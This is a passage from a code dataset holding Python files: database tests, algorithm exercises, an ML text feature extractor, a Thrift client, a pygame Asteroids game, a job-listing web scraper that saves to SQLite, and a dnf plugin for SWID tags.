linear_regressor.coef_[0]))\nplt.legend()\n\nplt.show()\n","sub_path":"gas_cost_plot.py","file_name":"gas_cost_plot.py","file_ext":"py","file_size_in_byte":6994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"330046516","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nbasedir = os.path.realpath(os.path.dirname(__file__))\nsys.path.append(os.path.join(basedir, \"..\"))\n\nfrom common import BaseTest\nfrom sql import SELECT\nfrom common import fileop\nfrom common import dbop\n\n\nclass TestSelect(BaseTest):\n \n def __init__(self, configPath):\n BaseTest.__init__(self, configPath, self.__class__.__name__)\n \n def setUp(self):\n pass\n \n def test_select_where(self):\n SQL = SELECT.create_sql_select_where()\n pgfile = dbop.sql_exe_pg_tofile('../peloton_test.conf', SQL, 'select_where.out')\n ptfile = dbop.sql_exe_pt_tofile('../peloton_test.conf', SQL, 
'select_where.out')\n res = fileop.compare_results(pgfile, ptfile)\n self.assertTrue(res)\n ## DEF\n\n def test_select_all(self):\n SQL = SELECT.create_sql_select_all()\n pgfile = dbop.sql_exe_pg_tofile('../peloton_test.conf', SQL, 'select_all.out')\n ptfile = dbop.sql_exe_pt_tofile('../peloton_test.conf', SQL, 'select_all.out')\n res = fileop.compare_results(pgfile, ptfile)\n self.assertTrue(res)\n ## DEF\n\n def test_select_where_withoutfile(self):\n SQL = SELECT.create_sql_select_where()\n pgres = dbop.sql_exe_pg('../peloton_test.conf', SQL)\n ptres = dbop.sql_exe_pt('../peloton_test.conf', SQL)\n self.assertTrue(pgres)\n ## DEF\n \n## CLASS\n\nif __name__ == '__main__':\n x = TestSelect(os.path.realpath(\"../test.conf\"))\n from pprint import pprint\n pprint(sorted(x.getTestTables(\"target\")))\n## IF\n\n","sub_path":"old/old_test_modules/_old/test_select.py","file_name":"test_select.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"401641269","text":"import TasMinTabCle\nimport time\nimport cle\nimport os\nimport csv\n\ndef mesureTemps(a,b):\n a.Union(b)\n\ndef mesureUnion(allFiles):\n allFiles.sort()\n allTas = list()\n for x in allFiles:\n param = list()\n f = open(\"cles_alea/\"+x,'r')\n for line in f:\n k = cle.Cle(line)\n param.append(k)\n \n a = TasMinTabCle.TasMinTab()\n a.ConsIter(param)\n allTas.append([x,a])\n \n tasJeu1 = allTas[0:8]\n tasJeu2 = allTas[8:16]\n tasJeu3 = allTas[16:24]\n tasJeu4 = allTas[24:32]\n tasJeu5 = allTas[32:40]\n \n \n res = list()\n \n for i in range(0,len(tasJeu1)):\n name = tasJeu1[i][0]\n numName = name[14:]\n d = time.time()\n mesureTemps(tasJeu1[i][1],tasJeu2[i][1])\n mesureTemps(tasJeu1[i][1],tasJeu3[i][1])\n mesureTemps(tasJeu1[i][1],tasJeu4[i][1])\n mesureTemps(tasJeu1[i][1],tasJeu5[i][1])\n e = time.time()\n tps = (e-d)*(10**3)\n res.append((\"5 * \"+numName,tps))\n \n return res\n\nallFiles = os.listdir(\"cles_alea\") \n \nRes = mesureUnion(allFiles)\ntotal = 0\nfor f in Res:\n total = total + f[1]\nRes.append((-1,\"total time in milliseconds for all files: \",total))\ncsvfileTime = \"timeTasMinTabUnion.csv\"\nwith open(csvfileTime,\"w\") as output:\n writer = csv.writer(output,lineterminator='\\n')\n writer.writerows(Res)\nprint(Res)","sub_path":"MesureTasMinTabCode/MesureTasMinUnion.py","file_name":"MesureTasMinUnion.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"167726123","text":"import dijkstra\nfrom solutions import Solution\n\n\ndef pe083() -> int:\n data = []\n with open(\"p083_matrix.txt\") as data_file:\n for line in data_file:\n data.append([int(x) for x in line.strip().split(\",\")])\n\n # data[y][x] contains the value in the yth row from top, xth column from left\n\n weights = {(x, y): {} for x in range(80) for y in range(80)}\n for x in range(80):\n for y in range(80):\n if x != 0:\n weights[(x - 1, y)][(x, y)] = data[y][x]\n if y != 0:\n weights[(x, y - 1)][(x, y)] = data[y][x]\n if x != 79:\n weights[(x + 1, y)][(x, y)] = data[y][x]\n if y != 79:\n weights[(x, y + 1)][(x, y)] = data[y][x]\n\n return data[0][0] + dijkstra.dijkstra((0, 0), (79, 79), weights)\n\n\nsolution = Solution(pe083, 425185)\n\nif __name__ == \"__main__\":\n assert 
solution.is_correct()\n","sub_path":"p083.py","file_name":"p083.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"69871828","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport string\nimport unicodedata\nimport urllib\n\nimport nltk\nimport scipy\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.preprocessing import normalize\n\n\ndef stopword_loader(\n url=\"https://raw.githubusercontent.com/mkobbi/subvention-status-datacamp/master/data/stopwords-filter-fr.txt\"):\n try:\n stopwords = str(urllib.urlopen(url).read().decode(\"utf-8\").lower())\n stopwords = set(stopwords.split('\\n'))\n return stopwords\n except IOError:\n print('Failed to open \"%s\".' % url)\n\n\ndef document_preprocessor(doc):\n \"\"\" A custom document preprocessor\n\n This function can be edited to add some additional\n transformations on the documents prior to tokenization.\n\n \"\"\"\n try:\n doc = unicode(doc, 'utf-8')\n except NameError: # unicode is a default on python 3\n pass\n doc = unicodedata.normalize('NFKD', doc)\n doc = doc.encode('ascii', 'ignore')\n doc = doc.decode(\"utf-8\")\n return str(doc).lower()\n\n\n# def generate_tokens\n\n\ndef token_processor(sentence):\n \"\"\" A custom token processor\n\n This function can be edited to add some additional\n transformations on the extracted tokens (e.g. stemming)\n\n At present, this function stems the tokens and filters out stopwords and punctuation.\n \"\"\"\n stopwords = stopword_loader()\n punctuation = set(string.punctuation)\n punctuation.update([\"``\", \"`\", \"...\"])\n stemmer = nltk.stem.snowball.FrenchStemmer()\n stemmed_tokens = list((filter(lambda x: x not in stopwords and x not in punctuation,\n [stemmer.stem(t)\n for t in nltk.word_tokenize(sentence, 'french', False)\n if t.isalpha()])))\n for t in stemmed_tokens:\n yield t\n\n\ndef cleanDataset(data):\n fr_stopwords_url = \"https://raw.githubusercontent.com/mkobbi/subvention-status-datacamp/master/data/stopwords-filter-fr.txt\"\n string_columns = ['Nom du partenaire'] # [\"Intitul de la demande\"]\n to_drop_columns = [\"Anne\", \"Siret\", \"N SIMPA\", 'CP-Adresse-Libell voie', \"CP-Adresse-Ville\"]\n str_categorical_columns = [\"Nom du partenaire\", \"Appel projets\", \"Appel projets PolVille\"]\n num_categorical_columns = [\"Anne\", \"CP-Adresse-Code postal\"]\n num_categorical_columns = [\"CP-Adresse-Code postal\"]\n data = data.fillna(value=0, axis='columns')\n data[string_columns] = data[string_columns].apply(\n lambda x: x.str.upper().str.normalize('NFKD').str.encode('ascii', errors='ignore').str.decode('utf-8'))\n data[str_categorical_columns] = data[str_categorical_columns].apply(lambda x: x.astype('category').cat.codes)\n data[num_categorical_columns] = data[num_categorical_columns].apply(\n lambda x: x.astype('int')) # .astype('category'))\n fr_stopwords = urllib.urlopen(fr_stopwords_url).read().decode(\"utf-8\").upper()\n fr_stopwords = fr_stopwords.split('\\n')\n # y = np.ravel(pd.DataFrame([data['Total vot'] > 0.0]).astype(int))\n # y = np.ravel(data.pop('y').values)\n data = data.drop(to_drop_columns, axis='columns')\n return data\n\n\nclass FeatureExtractor(TfidfVectorizer):\n \"\"\"Convert a collection of raw docs to a matrix of TF-IDF features. 
\"\"\"\n\n def __init__(self):\n # see ``TfidfVectorizer`` documentation for other feature\n # extraction parameters.\n super(FeatureExtractor, self).__init__(strip_accents='unicode',\n stop_words=stopword_loader(), analyzer='word')\n\n def fit(self, X_df, y=None):\n \"\"\"Learn a vocabulary dictionary of all tokens in the raw documents.\n\n Parameters\n ----------\n X_df : pandas.DataFrame\n a DataFrame, where the text data is stored in the ``Intitul de la demande``\n column.\n \"\"\"\n X_df = cleanDataset(X_df)\n super(FeatureExtractor, self).fit(X_df)\n return self\n\n def fit_transform(self, X_df, y=None):\n self.fit(X_df)\n return self.transform(X_df)\n\n def transform(self, X_df):\n # print \"transform X_df=\"\n # print X_df\n # print \"transform new=\"\n X_df = cleanDataset(X_df)\n words = super(FeatureExtractor, self).transform(X_df['Intitul de la demande'])\n\n X_df = X_df.drop(['Intitul de la demande'], axis='columns')\n data_sparse = scipy.sparse.csr_matrix(X_df.values[:, 1:])\n X = normalize(scipy.sparse.hstack((data_sparse, words)))\n return X\n\n def build_tokenizer(self):\n \"\"\"\n Internal function, needed to plug-in the token processor, cf.\n http://scikit-learn.org/stable/modules/feature_extraction.html#customizing-the-vectorizer-classes\n \"\"\"\n tokenize = super(FeatureExtractor, self).build_tokenizer()\n return lambda doc: token_processor(doc)","sub_path":"submissions/starting_kit/feature_extractor.py","file_name":"feature_extractor.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"224190020","text":"import sys\nimport glob\n#sys.path.append('lib')\n#sys.path.insert(0, glob.glob('../../lib/py/build/lib*')[0])\n\n\nfrom storage import StorageService\nfrom storage.ttypes import StoragePoint\n\nfrom thrift import Thrift\nfrom thrift.transport import TSocket\nfrom thrift.transport import TTransport\nfrom thrift.transport.TTransport import TTransportException\nfrom thrift.protocol import TBinaryProtocol\n\nclass StorageLibrary(object):\n\n def __init__(self):\n try:\n # Make socket\n self.transport = TSocket.TSocket('localhost', 9090)\n # Buffering is critical. 
Raw sockets are very slow\n self.transport = TTransport.TBufferedTransport(self.transport)\n # Wrap in a protocol\n self.protocol = TBinaryProtocol.TBinaryProtocol(self.transport)\n # Create a client to use the protocol encoder\n self.client = StorageService.Client(self.protocol)\n # Connect!\n self.transport.open()\n except TTransportException:\n raise AssertionError(\"Could not connect to Storage\")\n\n\n def Close(self):\n self.transport.close()\n\n def read_storage_point_value(self, id):\n numeric_id = int(id)\n exists = self._has_storage_point(numeric_id)\n if exists:\n return self.client.read(numeric_id)\n\n raise AssertionError(\"Storage point does not exists\")\n\n def write_storage_point_value(self, id, value):\n numeric_id = int(id)\n return self.client.write(numeric_id, value)\n\n def verify_write_and_read(self, id, value):\n numeric_id = int(id)\n r1 = self.client.read(numeric_id)\n self.client.write(numeric_id, value)\n r2 = self.client.read(numeric_id)\n if not r2 == value:\n raise AssertionError(\"write read failed\")\n\n def read_storage_points(self):\n points = self.client.storagePoints()\n\n print(\"type: \" + str(type(points)))\n for point in points:\n print(\"ID:\" + str(point.storageId) + \" Name: \" + point.name + \" Desc:\" + str(\n point.description) + \" Value:\" + str(point.value))\n #raise AssertionError(\"write read failed\")\n\n def _has_storage_point(self, id):\n points = self.client.storagePoints()\n\n print(\"type: \" + str(type(points)))\n for point in points:\n print(\"ID:\" + str(point.storageId) + \" Name: \" + point.name + \" Desc:\" + str(\n point.description) + \" Value:\" + str(point.value))\n if point.storageId == id:\n return True\n\n return False\n\n\n\nif __name__ == \"__main__\":\n app = StorageLibrary()\n app.client.ping()\n app.read_storage_points()\n #app.write_storage_point_value(0, \"new value\")\n #print(\"value: \" + app.read_storage_point_value(0))\n app.Close()","sub_path":"code/tests/lib/StorageLibrary.py","file_name":"StorageLibrary.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"617078514","text":"# 7. 
Min no of deletions from a string to make it a palindrome\n\ndef minDeletions(X,Y,n,m):\n for i in range(n+1):\n for j in range(m+1):\n if i == 0 or j == 0:\n t[i][j] = 0\n\n for i in range(1, n+1):\n for j in range(1, m+1):\n if X[i-1] == Y[j-1]:\n # t[i][j] = 1 + lcs(X,Y, n-1,m-1)\n t[i][j] = 1 + t[i-1][j-1]\n\n else:\n t[i][j] = max(t[i-1][j], t[i][j-1])\n\n minDeletion = n - t[n][m] # if deletion is minimum then length of string is maximum\n # so length of original string - longest palindromic subsequence = min no of deletions\n return minDeletion\n\nX = \"agbcba\"\nm = len(X)\n\nY = \"\".join(reversed(X))\nn = len(Y)\nt = [[-1 for j in range(m+1)] for i in range(n+1)]\n\nprint(minDeletions(X,Y,n,m))","sub_path":"Longest Common Subsequence/Problem7.py","file_name":"Problem7.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"505670876","text":"import pygame # Main Pygame Logic\r\n\r\nimport logging\r\n\r\nfrom Asteroids import Attributes, Menus, Assets, Logic\r\n\r\nformatter = logging.Formatter(\"%(name)s:%(levelname)s: %(message)s\")\r\nfile_handler = logging.FileHandler(\"log.txt\", mode='w')\r\nfile_handler.setFormatter(formatter)\r\nfile_handler.setLevel(logging.DEBUG)\r\n\r\nstream_handler = logging.StreamHandler()\r\nstream_handler.setFormatter(formatter)\r\n\r\n\r\nclass States:\r\n QUIT = 0\r\n MAIN_MENU = 1\r\n START_GAME = 2\r\n IN_GAME = 3\r\n PAUSED = 4\r\n GAME_OVER = 5\r\n\r\n\r\nclass Environment:\r\n\r\n def get_logger(self, logger_name):\r\n log = logging.getLogger(logger_name)\r\n log.setLevel(logging.DEBUG)\r\n stream_handler.setLevel(self.attributes.game.log_level)\r\n log.addHandler(file_handler)\r\n log.addHandler(stream_handler)\r\n return log\r\n\r\n def __init__(self, game_attributes, log_level=logging.ERROR):\r\n # Logging Initialization\r\n stream_handler.setLevel(log_level)\r\n\r\n self.log = logging.getLogger(\"ENV\")\r\n self.log.setLevel(log_level)\r\n self.log.addHandler(file_handler)\r\n self.log.addHandler(stream_handler)\r\n\r\n self.attributes = Attributes.Attributes(game_attributes)\r\n self.attributes.game.name = \"Asteroids - Developed by Nolan Emerson\"\r\n self.attributes.game.log_level = log_level\r\n self.state = None\r\n self.screen = None\r\n\r\n self.asteroids = []\r\n self.player = None\r\n\r\n pygame.init()\r\n self.clock = pygame.time.Clock()\r\n\r\n def init(self):\r\n log = self.get_logger(\"ENV:INIT\")\r\n\r\n log.info(\"Creating Window\")\r\n self.screen = pygame.display.set_mode(self.attributes.game.resolution)\r\n log.info(\"Setting Window Caption\")\r\n pygame.display.set_caption(self.attributes.game.name)\r\n\r\n def entry_point(self):\r\n log = self.get_logger(\"ENV:ENTR\")\r\n\r\n log.info(\"Initializing Game Environment\")\r\n self.init()\r\n self.state = States.MAIN_MENU\r\n log.info(\"Starting Main Loop\")\r\n self.main_loop()\r\n\r\n def no_menus(self):\r\n log = self.get_logger(\"ENV:ENTR\")\r\n\r\n log.info(\"Initializing Game Environment\")\r\n self.init()\r\n log.info(\"Resetting Game Environment\")\r\n self.reset()\r\n log.info(\"Starting Game Loop\")\r\n self.game_loop()\r\n\r\n def main_loop(self):\r\n log = self.get_logger(\"ENV:MAIN\")\r\n\r\n run = True\r\n while run:\r\n\r\n # pygame event handler\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n # Quit Game\r\n run = False\r\n\r\n log.debug(\"Firing State\")\r\n # State Launcher\r\n if self.state == States.MAIN_MENU:\r\n log.debug(\"State: MAIN 
MENU\")\r\n # Display Main Menu\r\n self.state = Menus.main(self)\r\n\r\n elif self.state == States.START_GAME:\r\n log.debug(\"State: START GAME\")\r\n # Reset Game Space\r\n self.reset()\r\n\r\n # Start Game\r\n self.state = States.IN_GAME\r\n\r\n elif self.state == States.IN_GAME:\r\n log.debug(\"State: IN GAME\")\r\n # Continue Game\r\n self.state = self.game_loop()\r\n\r\n elif self.state == States.PAUSED:\r\n log.debug(\"State: PAUSED\")\r\n log.info(\"Game Paused\")\r\n # Display Pause Menu\r\n self.state = Menus.pause(self)\r\n\r\n elif self.state == States.GAME_OVER:\r\n log.debug(\"State: GAME OVER\")\r\n # Display Game Over Menu\r\n self.state = Menus.game_over(self)\r\n\r\n elif self.state == States.QUIT:\r\n log.debug(\"State: QUIT\")\r\n log.info(\"Quitting Game\")\r\n run = False\r\n\r\n self.clock.tick(self.attributes.game.tick_rate)\r\n\r\n log.info(\"Quitting Window\")\r\n pygame.quit()\r\n\r\n def reset(self):\r\n log = self.get_logger(\"ENV:REST\")\r\n\r\n log.info(\"Resetting Game Environment\")\r\n self.asteroids = []\r\n self.player = Assets.PC.Ship.default(self)\r\n\r\n def game_loop(self):\r\n log = self.get_logger(\"ENV:GAME\")\r\n\r\n log.info(\"Entering/Re-Entering Game Loop\")\r\n while True:\r\n\r\n # pygame event handler\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n log.debug(\"Handling Pygame Event: QUIT\")\r\n # Quit Game\r\n return States.QUIT\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_p:\r\n log.debug(\"Player Pausing\")\r\n # Pause Game\r\n return States.PAUSED\r\n if event.key == pygame.K_SPACE:\r\n log.debug(\"Player Shooting\")\r\n # Make Player Shoot\r\n self.player.shoot_missile()\r\n\r\n # Logging\r\n if event.key == pygame.K_w:\r\n log.debug(\"Player Start Moving\")\r\n if event.key == pygame.K_a:\r\n log.debug(\"Player Start Rotate Left\")\r\n if event.key == pygame.K_d:\r\n log.debug(\"Player Start Rotate Right\")\r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_w:\r\n log.debug(\"Player Stop Moving\")\r\n if event.key == pygame.K_a:\r\n log.debug(\"Player Stop Rotate Left\")\r\n if event.key == pygame.K_d:\r\n log.debug(\"Player Stop Rotate Right\")\r\n\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_a]:\r\n # Turn Player Left\r\n self.player.rotate(self.player.Direction.LEFT)\r\n if keys[pygame.K_d]:\r\n # Turn Player Right\r\n self.player.rotate(self.player.Direction.RIGHT)\r\n if keys[pygame.K_w]:\r\n # Move Player Forward\r\n self.player.move_forward()\r\n\r\n # Game Logic Here\r\n if Logic.tick(self) == States.GAME_OVER:\r\n log.info(\"Game Over\")\r\n return States.GAME_OVER\r\n\r\n self.screen.fill((0, 0, 0))\r\n\r\n # Render Here\r\n Logic.render(self)\r\n\r\n pygame.display.flip()\r\n self.clock.tick(self.attributes.game.tick_rate)\r\n","sub_path":"Asteroids/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179587026","text":"from bs4 import BeautifulSoup\nimport xlwt\nimport urllib.request,urllib.error\nimport re\nimport sqlite3\nfrom urllib import parse\nfrom lxml import etree\n# 页面搜索路径:https://search.51job.com/list/010000,000000,0000,00,9,99,Java,2,1.html\n\n# kw = input(\"请输入你要搜索的关键字:\")\n# kw = input('输入想要选择的职位:')\n# keyword = parse.quote(parse.quote(kw))\n# pageNum = 1\n\ndef main():\n kw = input('输入想要选择的职位:')\n keyword = parse.quote(parse.quote(kw))\n # savepath = 'java.xls'\n\n datalist = getData(keyword)\n # 
saveData(datalist,savepath)\n dbpath = \"51job2.db\"\n saveData2DB(datalist,dbpath)\n\n\ndef getLink(html):\n linklist = []\n # html = open(nhtml, \"r\")\n bs = BeautifulSoup(html, \"html.parser\")\n scr = str(bs.find_all('script'))\n # print(scr)\n findLink = re.compile(r'\"job_href\":\"(.*?)\",')\n links = re.findall(findLink, scr)\n for link in links:\n link = link.replace('\\\\', '')\n linklist.append(link)\n # print(link)\n\n return linklist\ndef askURL(url):\n head = { # fake a browser header\n \"User-Agent\": \"Mozilla / 5.0(Windows NT 10.0;Win64;x64) AppleWebKit / 537.36(KHTML, likeGecko) Chrome / 85.0.4183.83Safari / 537.36\"\n }\n\n # user agent: tells the server what type of client we are and what content we can accept\n request = urllib.request.Request(url,headers=head)\n html = \"\"\n try:\n response = urllib.request.urlopen(request)\n html = response.read().decode(\"gbk\",\"ignore\")\n # print(html)\n\n except urllib.error.URLError as e:\n if hasattr(e,\"code\"):\n print(e.code)\n\n if hasattr(e,\"reason\"):\n print(e.reason)\n\n return html\n\ndef getData(keyword):\n datalist = []\n for i in range(1,16):\n url = \"https://search.51job.com/list/010000,000000,0000,00,9,99,\" + keyword + \",2,\" + str(i) + \".html\"\n html = askURL(url)\n linklist = getLink(html)\n for s in linklist:\n # if s == 'http://h3c.51job.com/jobdes.html?jobid=120663783':\n # continue\n # print(s)\n try:\n html = askURL(s)\n bs = BeautifulSoup(html, \"html.parser\")\n data = []\n jobName = bs.select(\"div.cn > h1\")[0]['title']\n data.append(jobName)\n salary = bs.select('div.cn > strong')[0].text\n data.append(salary)\n location = bs.select('div.cn > p.cname > a.catn')[0]['title']\n data.append(location)\n if len(data) < 3:\n data.append('N/A')\n datalist.append(data)\n except:\n print(s,'most likely redirected to the company homepage, so the elements could not be located')\n else:\n print(s,'captured normally')\n # except:\n # print('index out of range!!')\n\n\n\n print('length of datalist:',len(datalist))\n return datalist\n\n\ndef saveData(datalist,savepath):\n print(\"save....\")\n book = xlwt.Workbook(encoding=\"utf-8\",style_compression=0) # create the workbook object\n sheet = book.add_sheet('51Job',cell_overwrite_ok=True) # create the worksheet\n col = ('job title',\"salary\",\"company name\")\n for i in range(0,3):\n sheet.write(0,i,col[i]) # column names\n for i in range(len(datalist)):\n print(\"record %d\"%(i+1))\n data = datalist[i]\n for j in range(0,3):\n sheet.write(i+1,j,data[j])\n\n book.save(savepath)\ndef init_db(dbpath):\n sql = '''\n create table bigdata\n (\n id integer primary key autoincrement,\n jobname text,\n salary text,\n company text\n )\n ''' # create the data table\n conn = sqlite3.connect(dbpath)\n cursor = conn.cursor()\n cursor.execute(sql)\n conn.commit()\n conn.close()\ndef saveData2DB(datalist,dbpath):\n # init_db(dbpath)\n conn = sqlite3.connect(dbpath)\n cur = conn.cursor()\n\n for data in datalist:\n for index in range(len(data)):\n # if index == 4 or index == 5:\n # continue\n data[index] = '\"'+data[index]+'\"'\n sql = '''\n insert into bigdata (\n jobname,salary,company)\n values (%s)'''%\",\".join(data)\n print(sql)\n cur.execute(sql)\n conn.commit()\n\n cur.close()\n conn.close()\nif __name__ == \"__main__\":\n main()\n print(\"scraping finished\")\n # init_db('51job2.db')\n # askURL(\"https://jobs.51job.com/beijing-hdq/112159887.html?s=01&t=0\")","sub_path":"Spider.py","file_name":"Spider.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"554837680","text":"\nfrom dnf.cli import commands\n\nimport platform\n\nfrom dnf import Plugin, rpm\nfrom dnfpluginscore import logger\nfrom subprocess import run\nfrom os 
import path, makedirs, environ, unlink, listdir, rmdir, symlink\nimport re\nfrom rpm2swidtag import repodata\nfrom rpm2swidtag.rpm import get_nevra, get_checksum\nfrom glob import iglob\n\nNAME = \"swidtags\"\n\nSWIDTAG_DIR_GEN = \"var/lib/swidtag\"\nSWIDTAG_DIR_DOWNLOAD = \"usr/lib/swidtag\"\nSWIDTAGS_D = \"etc/swid/swidtags.d\"\n\nclass swidtagsCommand(commands.Command):\n\taliases = [ NAME ]\n\tsummary = \"Maintain SWID tags for installed rpms\"\n\n\tplugin = None\n\n\tdef __init__(self, cli):\n\t\tsuper(swidtagsCommand, self).__init__(cli)\n\t\t# waiting for API: https://bugzilla.redhat.com/show_bug.cgi?id=1678176\n\t\t#pylint: disable=protected-access\n\t\tfor p in self.base._plugins.plugins:\n\t\t\tif p.name == NAME:\n\t\t\t\tself.plugin = p\n\t\t\t\tbreak\n\t\tif not self.plugin:\n\t\t\tlogger.error(\"Internal error: cannot find the plugin from command.\")\n\t\t\treturn\n\n\tdef configure(self):\n\t\tself.cli.demands.available_repos = True\n\t\tself.cli.demands.sack_activation = True\n\t\tself.cli.demands.resolving = False\n\t\tself.cli.demands.root_user = True\n\n\tdef set_argparser(self, parser):\n\t\tparser.add_argument(\"swidtagscmd\", nargs=1, choices=[\"sync\", \"regen\", \"purge\"], help=\"\"\"\nsync for installed rpms, fetch SWID tags from repository metadata or generate them locally\nregen synonym to sync\npurge remove all SWID tags that were locally-generated by the plugin\n\"\"\"\n\t\t)\n\n\tdef run(self):\n\t\tif self.opts.swidtagscmd[0] in ( \"purge\", \"sync\", \"regen\" ):\n\t\t\tself.plugin.purge_generated_dir()\n\t\t\tself.plugin.purge_generated_symlink()\n\t\telse:\n\t\t\tprint(\"dnf swidtags [sync | purge]\")\n\n\t\tif self.opts.swidtagscmd[0] in ( \"sync\", \"regen\" ):\n\t\t\tts = rpm.transaction.initReadOnlyTransaction(root=self.base.conf.installroot)\n\t\t\tpkgs = []\n\t\t\tfor p in ts.dbMatch():\n\t\t\t\t# Filter out imported GPG keys\n\t\t\t\tif p[\"arch\"]:\n\t\t\t\t\tpkgs.append(p)\n\n\t\t\tdirs = {}\n\t\t\tfor r in self.base.repos.iter_enabled():\n\t\t\t\tif not hasattr(r, \"get_metadata_path\"):\n\t\t\t\t\tcontinue\n\t\t\t\tfile = r.get_metadata_path(self.plugin.METADATA_TYPE)\n\t\t\t\tif not file or file == \"\":\n\t\t\t\t\tcontinue\n\t\t\t\ts = repodata.Swidtags(None, file)\n\t\t\t\ttags = s.tags_for_rpm_packages(pkgs)\n\n\t\t\t\tremaining_pkgs = []\n\t\t\t\tfor p in pkgs:\n\t\t\t\t\tif p not in tags:\n\t\t\t\t\t\tremaining_pkgs.append(p)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tfound = False\n\t\t\t\t\tfor t in tags[p]:\n\t\t\t\t\t\tlogger.debug(\"Retrieved SWID tag from repodata for %s: %s\", get_nevra(p), t.get_tagid())\n\t\t\t\t\t\tx = t.save_to_directory(self.plugin.dir_downloaded)\n\t\t\t\t\t\tdirs[x[0]] = True\n\t\t\t\t\t\tfound = True\n\t\t\t\t\tif not found:\n\t\t\t\t\t\tremaining_pkgs.append(p)\n\n\t\t\t\tpkgs = remaining_pkgs\n\n\t\t\tfor d in dirs:\n\t\t\t\tself.plugin.create_swidtags_d_symlink(path.basename(d))\n\n\t\t\tif len(pkgs) > 0:\n\t\t\t\trun_ret = self.plugin.run_rpm2swidtag_for([ get_nevra(p) for p in pkgs ])\n\t\t\t\tif run_ret == 0:\n\t\t\t\t\tpkgs_missing = {}\n\t\t\t\t\tfor p in pkgs:\n\t\t\t\t\t\tpkgs_missing[get_checksum(p)] = p\n\t\t\t\t\tfor f in iglob(path.join(self.plugin.dir_generated, \"*-rpm-*.swidtag\")):\n\t\t\t\t\t\tm = re.search(r'-rpm-([0-9a-f]{40}([0-9a-f]{24})?)\\.swidtag$', f)\n\t\t\t\t\t\tif m and m.group(1) in pkgs_missing:\n\t\t\t\t\t\t\tdel pkgs_missing[m.group(1)]\n\t\t\t\t\tfor p in pkgs_missing.values():\n\t\t\t\t\t\tlogger.warning(\"The SWID tag for rpm %s should have been generated but could not be found\", 
get_nevra(p))\n\t\t\t\tif run_ret == -2:\n\t\t\t\t\tlogger.warning(\"The rpm2swidtag_command not configured for the %s plugin.\\nSWID tags not generated locally for %d packages.\", NAME, len(pkgs))\n\n\nclass swidtags(Plugin):\n\n\tname = NAME\n\tgenerated_dirname = \"rpm2swidtag-generated\"\n\n\tMETADATA_TYPE = \"swidtags\"\n\n\tdef __init__(self, base, cli):\n\t\tsuper().__init__(base, cli)\n\t\tself.conf = None\n\t\tself.install_set = None\n\t\tself.remove_set = None\n\t\tself.remove_set_checksum = {}\n\t\tself.dir_generated = path.join(base.conf.installroot, SWIDTAG_DIR_GEN, self.generated_dirname)\n\t\tself.dir_downloaded = path.join(base.conf.installroot, SWIDTAG_DIR_DOWNLOAD)\n\t\tself.swidtags_d = path.join(base.conf.installroot, SWIDTAGS_D)\n\t\tself.ts = None\n\t\tif cli:\n\t\t\tcli.register_command(swidtagsCommand)\n\n\tdef config(self):\n\t\tsuper(swidtags, self).config()\n\t\tself.conf = self.read_config(self.base.conf)\n\t\tDEFAULTS = { \"main\": {\n\t\t\t}\n\t\t}\n\t\tfor s in DEFAULTS:\n\t\t\tif not self.conf.has_section(s):\n\t\t\t\ttry:\n\t\t\t\t\tself.conf.addSection(s)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tself.conf.add_section(s)\n\t\t\tfor o in DEFAULTS[s]:\n\t\t\t\tif not self.conf.has_option(s, o):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tself.conf.setValue(s, o, DEFAULTS[s][o])\n\t\t\t\t\texcept AttributeError:\n\t\t\t\t\t\tself.conf.set(s, o, DEFAULTS[s][o])\n\n\t\tfor repo in self.base.repos.iter_enabled():\n\t\t\tif hasattr(repo, \"add_metadata_type_to_download\"):\n\t\t\t\tlogger.debug(\"Will ask for SWID tags download for %s\", str(repo.baseurl))\n\t\t\t\trepo.add_metadata_type_to_download(self.METADATA_TYPE)\n\n\tdef resolved(self):\n\t\tself.install_set = self.base.transaction.install_set\n\t\tself.remove_set = self.base.transaction.remove_set\n\t\tfor p in self.remove_set:\n\t\t\tself.remove_set_checksum[p] = self.get_nevra_checksum(str(p), verbose=False)\n\n\tdef transaction(self):\n\t\tremove_packages = {}\n\t\tfor p in self.remove_set:\n\t\t\tif p not in self.remove_set_checksum:\n\t\t\t\tlogger.warning(\"Could not identify checksum for %s, potential SWID tag will not be removed\", p)\n\t\t\t\tcontinue\n\t\t\tremove_packages[self.remove_set_checksum[p]] = True\n\t\tif len(remove_packages) > 0:\n\t\t\tfor f in iglob(path.join(self.base.conf.installroot, SWIDTAGS_D, \"*\", \"*-rpm-*.swidtag\")):\n\t\t\t\tm = re.search(r'-rpm-([0-9a-f]{40}([0-9a-f]{24})?)\\.swidtag$', f)\n\t\t\t\tif not 